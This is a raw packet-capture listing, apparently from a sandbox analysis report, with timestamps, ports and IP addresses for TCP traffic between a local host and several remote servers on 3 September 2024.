Sep 3, 2024 17:13:19.768287897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768297911 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768297911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.768394947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768405914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768415928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768431902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768477917 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.768477917 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.768518925 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768529892 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768640995 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768651009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768661022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768673897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768676043 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.768697977 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.768697977 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.768740892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.768770933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768783092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768799067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768821955 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.768866062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768866062 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.768877029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768950939 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.768951893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768963099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768973112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768984079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768995047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.769026041 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.769038916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.769211054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.769222021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.769232035 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.769248009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.769258976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.769269943 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.769273043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.769284964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.769294024 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.769298077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.769335032 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.769335032 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.769366980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.769506931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.769517899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.769530058 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.769542933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.769583941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.769583941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.769655943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.769665956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.769675970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.769686937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.769725084 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.769725084 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.769973993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.769990921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.769999027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.770051956 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.770075083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.770076036 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.770086050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.770097017 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.770108938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.770128012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.770139933 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.770178080 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.770180941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.770222902 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.770252943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.770263910 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.770273924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.770283937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.770314932 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.770333052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.770394087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.770412922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.770422935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.770461082 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.770461082 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.770479918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.770490885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.770546913 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.771047115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771064043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771073103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771111965 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.771158934 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.771183014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771193981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771203995 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771228075 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.771248102 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.771267891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771279097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771343946 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.771361113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771377087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771420956 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.771430969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771445990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771457911 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771467924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771497011 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.771547079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.771549940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771562099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771605015 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.771605015 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.771692991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771704912 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771743059 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.771783113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771794081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771804094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771812916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771822929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771831036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771859884 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.771859884 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.771891117 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.771904945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771924019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.771953106 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.771969080 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.772053003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772063971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772082090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772097111 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.772110939 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.772170067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772181988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772192955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772232056 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.772308111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772317886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772330046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772341013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772356987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772361040 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.772370100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772382021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772399902 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.772399902 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.772417068 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.772671938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772684097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772694111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772706032 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772717953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772725105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.772731066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772758007 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.772758007 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.772862911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.772927046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772939920 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772949934 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772964001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772974968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772979975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.772990942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.773015022 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.773015022 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.773025036 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.779361010 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:19.784241915 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:19.817107916 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.817161083 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.817173004 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.817224979 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.817251921 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.817264080 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.817292929 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.817316055 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.818145037 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.818186998 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.818195105 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.818198919 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.818226099 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.818238020 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.818269014 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.818326950 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.818370104 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.818375111 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.818411112 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.818491936 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.818536997 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.818545103 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.818622112 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.818680048 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.818691015 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.818731070 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.818936110 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.818994045 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.819004059 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.819016933 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.819058895 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.819089890 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.819101095 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.819138050 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.819160938 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.819231033 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.819313049 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.819359064 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.819371939 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.819386005 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.819427013 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.819535971 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.819546938 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.819561005 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.819608927 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.819947958 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.819982052 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.819994926 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.820003033 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.820024967 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.820072889 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.820085049 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.820142031 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.820609093 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.820626020 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.820636988 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.820653915 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.820669889 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.820720911 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.820792913 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.820883989 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.820939064 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.820950031 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.820997953 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.821014881 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.821078062 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.821089983 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.821106911 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.821113110 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.821131945 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.821156025 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.821199894 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.821294069 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.821867943 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.821878910 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.821888924 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.821918964 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.821938992 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.821959019 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.821969032 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.821986914 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.821997881 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.822025061 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.822048903 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.822082043 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.822174072 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.822743893 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.822833061 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.866647959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.866949081 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.867000103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.867012978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.867072105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.867224932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.867253065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.867269993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.867280006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.867341995 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.867352962 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.867356062 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.867363930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.867376089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.867386103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.867388964 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.867398024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.867398977 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.867410898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.867425919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.867432117 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.867445946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.867456913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.867460012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.867482901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.867485046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.867497921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.867503881 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.867543936 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.867568970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.867635012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.868202925 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868220091 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868231058 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868242025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868257046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868268013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868277073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868282080 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.868289948 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868295908 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.868304014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868313074 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868331909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868343115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868351936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868352890 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.868352890 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.868365049 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868376017 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868377924 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.868387938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868388891 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.868400097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868427038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.868433952 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.868449926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868463993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868473053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868500948 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.868510962 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.868882895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868894100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868904114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868913889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.868972063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.868972063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.869000912 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.869012117 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.869023085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.869033098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.869045973 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.869050980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.869061947 CEST	80	49730	52.212.52.84	192.168.2.8
